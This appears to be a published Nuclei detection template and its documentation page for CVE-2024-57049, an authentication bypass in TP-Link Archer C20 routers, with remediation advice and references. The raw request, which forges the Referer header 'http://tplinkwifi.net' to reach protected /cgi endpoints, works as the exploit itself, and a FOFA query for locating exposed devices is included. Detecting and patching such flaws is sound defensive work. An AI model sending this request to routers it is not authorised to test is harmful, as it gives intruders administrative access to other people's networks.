TP-Link Archer C20 - Authentication Bypass
ID: CVE-2024-57049
Severity: critical
Author: ritikchaddha
Tags: cve,cve2024,tp-link,auth-bypass,archer-c20
Description
Section titled “Description”A vulnerability in the TP-Link Archer C20 router with firmware version V6.6_230412 and earlier permits unauthorized individuals to bypass authentication on interfaces under the /cgi directory. When adding a Referer header with value “http://tplinkwifi.net” to requests, the router will recognize the request as passing authentication, allowing access to protected administration interfaces.
YAML Source
Section titled “YAML Source”id: CVE-2024-57049
info: name: TP-Link Archer C20 - Authentication Bypass author: ritikchaddha severity: critical description: | A vulnerability in the TP-Link Archer C20 router with firmware version V6.6_230412 and earlier permits unauthorized individuals to bypass authentication on interfaces under the /cgi directory. When adding a Referer header with value "http://tplinkwifi.net" to requests, the router will recognize the request as passing authentication, allowing access to protected administration interfaces. remediation: | Update the router firmware to the latest version. Implement network segmentation to restrict access to the router's management interface. reference: - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/archer%20c20/ACL%20bypass%20Vulnerability%20in%20TP-Link%20archer%20c20.md - https://nvd.nist.gov/vuln/detail/CVE-2024-57049 - https://github.com/advisories/GHSA-qr32-fcm4-m5h9 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-57049 cwe-id: CWE-287 metadata: max-request: 1 verified: true fofa-query: body="Archer C20" tags: cve,cve2024,tp-link,auth-bypass,archer-c20
http: - raw: - | POST /cgi/getGDPRParm HTTP/1.1 Host: {{Hostname}} Referer: http://tplinkwifi.net
matchers-condition: and matchers: - type: word part: body words: - "$.ret=0;" - "var " condition: and
- type: word part: content_type words: - "application/javascript"
- type: status status: - 200# digest: 490a0046304402206c2a7aafbf3fd8962754a8ed8b2f656c9ed7167bb42755b1e669d96adb9d0b3502206e2f26c3697acbd830b80894976b744861e8622878a4afec4e2a56922488e51a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-57049.yaml"